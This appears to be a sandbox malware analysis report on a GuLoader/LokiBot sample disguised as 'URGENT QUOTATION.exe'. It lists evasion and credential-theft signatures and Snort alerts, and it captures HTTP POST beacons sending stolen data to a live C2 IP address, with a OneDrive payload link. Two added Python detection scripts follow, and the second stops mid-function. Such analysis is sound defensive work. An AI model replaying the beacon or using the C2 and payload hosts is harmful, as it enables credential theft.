Analysis Report URGENT QUOTATION.exe

Overview

General Information

Sample Name: URGENT QUOTATION.exe
Analysis ID: 356236
MD5: b49c71be94624173a9683580c792b195
SHA1: 4b78a8199129007580b91060db70ce44fe7278e5
SHA256: 8cf8f18fb85f0e190ff77fd57264cf9e31dd7128f1b4ad43713e128a6d68e867
Tags: GuLoader


Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Multi AV Scanner detection for domain / URL
Source: http://51.195.53.221/p.php/594QbwaP456AN Virustotal: Detection: 10%
Multi AV Scanner detection for submitted file
Source: URGENT QUOTATION.exe Virustotal: Detection: 28%
Source: URGENT QUOTATION.exe ReversingLabs: Detection: 48%
Machine Learning detection for sample
Source: URGENT QUOTATION.exe Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: URGENT QUOTATION.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49743 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49743 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49743 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49743 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49744 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49744 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49744 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49744 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49745 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49745 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49745 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49745 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49748 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49748 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49748 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49748 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49749 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49749 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49749 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49749 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49750 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49750 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49750 -> 51.195.53.221:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49750 -> 51.195.53.221:80
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 51.195.53.221 51.195.53.221
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: six POST requests to the same URL (Content-Length 190 in the first two, 163 in the remaining four); request head as captured:
    POST /p.php/594QbwaP456AN HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 51.195.53.221
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 244CE878
    Content-Length: 190
    Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.53.221 (reported 50 times; the sample connects to the IP address directly, no hostname is resolved first)
Source: unknown DNS traffic detected: queries for: onedrive.live.com
Source: unknown HTTP traffic detected:
    POST /p.php/594QbwaP456AN HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 51.195.53.221
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 244CE878
    Content-Length: 190
    Connection: close
Source: global traffic HTTP traffic detected (server response):
    HTTP/1.1 404 Not Found
    Date: Mon, 22 Feb 2021 18:55:26 GMT
    Server: Apache
    Connection: close
    Content-Type: text/html; charset=UTF-8
Source: URGENT QUOTATION.exe, 00000004.00000002.711543447.000000001E174000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: URGENT QUOTATION.exe, 00000004.00000002.711543447.000000001E174000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: URGENT QUOTATION.exe, 00000004.00000002.711543447.000000001E174000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: URGENT QUOTATION.exe, 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp String found in binary or memory: https://onedrive.live.com/download?cid=604AA6C584DB9137&resid=604AA6C584DB9137%21123&authkey=ANCFnep
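The Snort alerts above attribute the C2 traffic to LokiBot while the static and Yara results say GuLoader, which is consistent with GuLoader acting as the loader and LokiBot as the delivered payload. As an added detection example (not code from the Joe Sandbox report), the Python below reproduces the two network heuristics this section fires on: the LokiBot check-in fingerprint (User-Agent Mozilla/4.08 (Charon; Inferno), the non-standard Content-Key header, an HTTP/1.0 POST of application/octet-stream to a <name>.php/<id> path on a bare-IP Host) and the "TCP traffic without corresponding DNS query" check. The sample request is the one captured above with its CRLF line breaks restored and a placeholder body; the second request, the DNS answer set and the connection list are constructed for the example, and the path regex is an assumption about the panel URL layout, not something the report states.

```python
"""Flag LokiBot-style check-ins and direct-to-IP connections in captured HTTP traffic.
Added example; the fingerprint values come from the report, the other inputs are constructed."""
import re
from typing import Dict, List, Optional, Sequence, Set, Tuple

# Observed in the report: LokiBot's hard-coded User-Agent (ET SID 2021641)
LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"
# Assumption: panel URL shaped like /<name>.php/<alphanumeric id> (as in /p.php/594QbwaP456AN)
PANEL_PATH_RE = re.compile(r"^/[^/?\s]+\.php/[A-Za-z0-9]{8,}$")
BARE_IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")

# The captured request head with CRLF separators restored; the body is a constructed placeholder.
SAMPLE_BEACON = (
    b"POST /p.php/594QbwaP456AN HTTP/1.0\r\n"
    b"User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    b"Host: 51.195.53.221\r\n"
    b"Accept: */*\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Encoding: binary\r\n"
    b"Content-Key: 244CE878\r\n"
    b"Content-Length: 190\r\n"
    b"Connection: close\r\n\r\n"
) + b"\x00" * 190
# Constructed ordinary request that must not match.
OTHER_REQUEST = (
    b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\nAccept: */*\r\n\r\n"
)
# Constructed DNS answers and TCP connections from the same capture.
RESOLVED_IPS: Set[str] = {"203.0.113.10"}
CONNECTIONS: List[Tuple[str, int]] = [("203.0.113.10", 443), ("51.195.53.221", 80)]


def parse_http_request(raw: bytes) -> Optional[Dict[str, str]]:
    """Split a raw request into request-line fields plus lower-cased header names."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return None
    req = {"method": parts[0], "path": parts[1], "version": parts[2]}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            req[name.strip().lower()] = value.strip()
    return req


def lokibot_indicators(req: Dict[str, str]) -> List[str]:
    """Return the LokiBot check-in traits present in one parsed request."""
    hits: List[str] = []
    if req.get("user-agent") == LOKIBOT_UA:
        hits.append("User-Agent Mozilla/4.08 (Charon; Inferno)")
    if "content-key" in req:
        hits.append("non-standard Content-Key header")
    if (req["method"], req["version"]) == ("POST", "HTTP/1.0") and \
            req.get("content-type") == "application/octet-stream":
        hits.append("HTTP/1.0 POST of application/octet-stream")
    if PANEL_PATH_RE.match(req["path"]):
        hits.append("panel-style path <name>.php/<id>")
    if BARE_IP_RE.match(req.get("host", "")):
        hits.append("Host header is a bare IP address")
    return hits


def scan_requests(raw_requests: Sequence[bytes]) -> List[Tuple[str, str, List[str]]]:
    """(host, path, indicators) for every request showing at least one LokiBot trait."""
    findings = []
    for raw in raw_requests:
        req = parse_http_request(raw)
        if req is None:
            continue
        hits = lokibot_indicators(req)
        if hits:
            findings.append((req.get("host", ""), req["path"], hits))
    return findings


def connections_without_dns(resolved: Set[str], conns: List[Tuple[str, int]]) -> List[Tuple[str, int]]:
    """Connections whose destination never appeared in a DNS answer (the 'no DNS query' check)."""
    return [c for c in conns if c[0] not in resolved]


if __name__ == "__main__":
    for host, path, hits in scan_requests([SAMPLE_BEACON, OTHER_REQUEST]):
        print(f"{host}{path}: " + "; ".join(hits))
    print("direct-to-IP:", connections_without_dns(RESOLVED_IPS, CONNECTIONS))
```

Any single trait is weak on its own (bare-IP Hosts and HTTP/1.0 POSTs occur in legitimate software), which is why the Emerging Threats rules key on the exact User-Agent string; the other checks are there to keep a hit when the operator rotates the UA.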

System Summary:

Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: URGENT QUOTATION.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021853EC NtWriteVirtualMemory, 0_2_021853EC
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218613D NtSetInformationThread,NtMapViewOfSection, 0_2_0218613D
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02185CF0 NtProtectVirtualMemory, 0_2_02185CF0
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021804E7 EnumWindows,NtSetInformationThread,NtWriteVirtualMemory, 0_2_021804E7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186210 NtMapViewOfSection, 0_2_02186210
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186239 NtMapViewOfSection, 0_2_02186239
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186263 NtMapViewOfSection, 0_2_02186263
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186281 NtMapViewOfSection, 0_2_02186281
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186315 NtMapViewOfSection, 0_2_02186315
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218633D NtMapViewOfSection, 0_2_0218633D
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186328 NtMapViewOfSection, 0_2_02186328
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186353 NtMapViewOfSection, 0_2_02186353
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186387 NtMapViewOfSection, 0_2_02186387
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218182B NtWriteVirtualMemory, 0_2_0218182B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182822 NtWriteVirtualMemory, 0_2_02182822
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182873 NtWriteVirtualMemory, 0_2_02182873
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021820B4 NtSetInformationThread, 0_2_021820B4
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021828CA NtWriteVirtualMemory, 0_2_021828CA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218290F NtWriteVirtualMemory, 0_2_0218290F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186145 NtMapViewOfSection, 0_2_02186145
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218216A NtSetInformationThread,NtWriteVirtualMemory, 0_2_0218216A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186161 NtMapViewOfSection, 0_2_02186161
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186197 NtMapViewOfSection, 0_2_02186197
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021861B5 NtMapViewOfSection, 0_2_021861B5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021861F5 NtMapViewOfSection, 0_2_021861F5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02180602 NtSetInformationThread, 0_2_02180602
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182605 NtWriteVirtualMemory, 0_2_02182605
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218063F NtSetInformationThread, 0_2_0218063F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182666 NtWriteVirtualMemory, 0_2_02182666
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182689 NtWriteVirtualMemory, 0_2_02182689
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021826B2 NtWriteVirtualMemory, 0_2_021826B2
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021826F9 NtWriteVirtualMemory, 0_2_021826F9
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182727 NtWriteVirtualMemory, 0_2_02182727
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182773 NtWriteVirtualMemory, 0_2_02182773
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021827A3 NtWriteVirtualMemory, 0_2_021827A3
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218247B NtWriteVirtualMemory, 0_2_0218247B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021824D3 NtWriteVirtualMemory, 0_2_021824D3
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021824EB NtWriteVirtualMemory, 0_2_021824EB
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021814E5 NtWriteVirtualMemory, 0_2_021814E5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182523 NtWriteVirtualMemory, 0_2_02182523
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218058F NtSetInformationThread, 0_2_0218058F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182581 NtWriteVirtualMemory, 0_2_02182581
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021825B7 NtWriteVirtualMemory, 0_2_021825B7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021805AB NtSetInformationThread, 0_2_021805AB
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021805CD NtSetInformationThread, 0_2_021805CD
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021845FA NtSetInformationThread,NtWriteVirtualMemory, 0_2_021845FA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00565CF0 NtProtectVirtualMemory, 4_2_00565CF0
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562CB0 Sleep,NtProtectVirtualMemory, 4_2_00562CB0
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_0056216A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory, 4_2_0056216A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_0056210E TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory, 4_2_0056210E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_0056613D NtSetInformationThread, 4_2_0056613D
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562DB2 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory, 4_2_00562DB2
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005620B4 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory, 4_2_005620B4
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562D5B NtProtectVirtualMemory, 4_2_00562D5B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562144 LdrInitializeThunk,NtProtectVirtualMemory, 4_2_00562144
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566145 NtSetInformationThread, 4_2_00566145
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_0056217B NtProtectVirtualMemory, 4_2_0056217B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566161 NtSetInformationThread, 4_2_00566161
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562117 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory, 4_2_00562117
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562D26 NtProtectVirtualMemory, 4_2_00562D26
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562D29 NtProtectVirtualMemory, 4_2_00562D29
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005661F5 NtSetInformationThread, 4_2_005661F5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005621EF NtProtectVirtualMemory, 4_2_005621EF
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562D96 LdrInitializeThunk,NtProtectVirtualMemory, 4_2_00562D96
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566197 NtSetInformationThread, 4_2_00566197
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562D99 LdrInitializeThunk,NtProtectVirtualMemory, 4_2_00562D99
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005621B5 NtProtectVirtualMemory, 4_2_005621B5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005661B5 NtSetInformationThread, 4_2_005661B5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562DBB LdrInitializeThunk,NtProtectVirtualMemory, 4_2_00562DBB
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562E46 LdrInitializeThunk,NtProtectVirtualMemory, 4_2_00562E46
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566263 NtSetInformationThread, 4_2_00566263
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566210 NtSetInformationThread, 4_2_00566210
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562E0F LdrInitializeThunk,NtProtectVirtualMemory, 4_2_00562E0F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566239 NtSetInformationThread, 4_2_00566239
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566281 NtSetInformationThread, 4_2_00566281
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566353 NtSetInformationThread, 4_2_00566353
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566315 NtSetInformationThread, 4_2_00566315
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_0056633D NtSetInformationThread, 4_2_0056633D
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566328 NtSetInformationThread, 4_2_00566328
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00566387 NtSetInformationThread, 4_2_00566387
Detected potential crypto function
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562F0F 4_2_00562F0F
Sample file is different than original file name gathered from version info
Source: URGENT QUOTATION.exe, 00000000.00000000.646889990.000000000043B000.00000002.00020000.sdmp Binary or memory string: OriginalFilename: constantinsborg.exe vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe, 00000000.00000002.674117945.0000000002140000.00000002.00000001.sdmp Binary or memory string: OriginalFilename: user32j% vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe, 00000004.00000002.711483674.000000001DD80000.00000002.00000001.sdmp Binary or memory string: OriginalFilename: mswsock.dll.muij% vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe, 00000004.00000002.711498445.000000001DED0000.00000002.00000001.sdmp Binary or memory string: OriginalFilename: CRYPT32.DLL.MUIj% vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe, 00000004.00000000.671322005.000000000043B000.00000002.00020000.sdmp Binary or memory string: OriginalFilename: constantinsborg.exe vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe Binary or memory string: OriginalFilename: constantinsborg.exe vs URGENT QUOTATION.exe
Uses 32bit PE files
Source: URGENT QUOTATION.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/2@2/1
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File created: C:\Users\user\AppData\Local\Temp\~DFBD8596DEFB17F0B4.TMP
Source: URGENT QUOTATION.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File read: C:\Windows\System32\drivers\etc\hosts (3 times)
Source: URGENT QUOTATION.exe Virustotal: Detection: 28%
Source: URGENT QUOTATION.exe ReversingLabs: Detection: 48%
Source: unknown Process created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe'
Source: unknown Process created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe'
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe'
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: URGENT QUOTATION.exe PID: 6160, type: MEMORY
Source: Yara match File source: Process Memory Space: URGENT QUOTATION.exe PID: 6792, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: URGENT QUOTATION.exe PID: 6160, type: MEMORY
Source: Yara match File source: Process Memory Space: URGENT QUOTATION.exe PID: 6792, type: MEMORY
PE file contains an invalid checksum
Source: URGENT QUOTATION.exe Static PE information: real checksum: 0x29a19 should be: 0x2d90a
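The "invalid checksum" signature compares the CheckSum field of IMAGE_OPTIONAL_HEADER (the "real checksum", here 0x29a19) with a value recomputed over the whole file (the "should be" value, 0x2d90a). A stored value of zero is the normal case for unsigned builds and is not suspicious by itself; a non-zero value that does not match, as here, usually means the image was modified after the linker wrote the header, which is what a crypter does. As an added example, not code from the report or from Joe Sandbox, the Python below implements that recomputation (the algorithm behind imagehlp MapFileAndCheckSum: a dword sum with end-around carry, folded to 16 bits, plus the file length, with the CheckSum field itself excluded) and runs it against a constructed 1 KiB PE32 skeleton whose header values are arbitrary and which is not a loadable binary. To check a real file, pass its bytes to verify_pe_checksum instead of build_sample_image().

```python
"""Recompute a PE file's header CheckSum and compare it with the stored value.
Added example: the algorithm is the one imagehlp's MapFileAndCheckSum uses; the sample image is constructed."""
import struct

CHECKSUM_FIELD_OFFSET = 64      # offset of CheckSum inside IMAGE_OPTIONAL_HEADER (PE32 and PE32+)


def checksum_field_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum, located via e_lfanew."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    return e_lfanew + 4 + 20 + CHECKSUM_FIELD_OFFSET     # signature + IMAGE_FILE_HEADER + field


def compute_pe_checksum(data: bytes) -> int:
    """Sum every dword except the CheckSum field with end-around carry, fold to 16 bits, add the length."""
    skip = checksum_field_offset(data) & ~3
    padded = data + b"\0" * (-len(data) % 4)             # tail zero-padded to a dword boundary
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue                                     # the field being computed is excluded
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)                  # unpadded length


def stored_pe_checksum(data: bytes) -> int:
    """The CheckSum value as written in the header."""
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]


def verify_pe_checksum(data: bytes):
    """(stored, recomputed, matches): the report's 'real checksum' and 'should be' values."""
    stored, real = stored_pe_checksum(data), compute_pe_checksum(data)
    return stored, real, stored == real


def set_pe_checksum(data: bytes) -> bytes:
    """Return a copy with a correct CheckSum written into the header."""
    fixed = bytearray(data)
    struct.pack_into("<I", fixed, checksum_field_offset(data), compute_pe_checksum(data))
    return bytes(fixed)


def build_sample_image() -> bytes:
    """Constructed 1 KiB PE32 skeleton: DOS header, one .text section, CheckSum left at zero."""
    img = bytearray(1024)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                                   # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", img, 0x44, 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)  # IMAGE_FILE_HEADER: i386, 1 section
    opt = 0x58
    struct.pack_into("<H", img, opt, 0x10B)                                   # PE32 magic
    struct.pack_into("<I", img, opt + 16, 0x1000)                             # AddressOfEntryPoint
    struct.pack_into("<III", img, opt + 28, 0x400000, 0x1000, 0x200)         # ImageBase, SectionAlignment, FileAlignment
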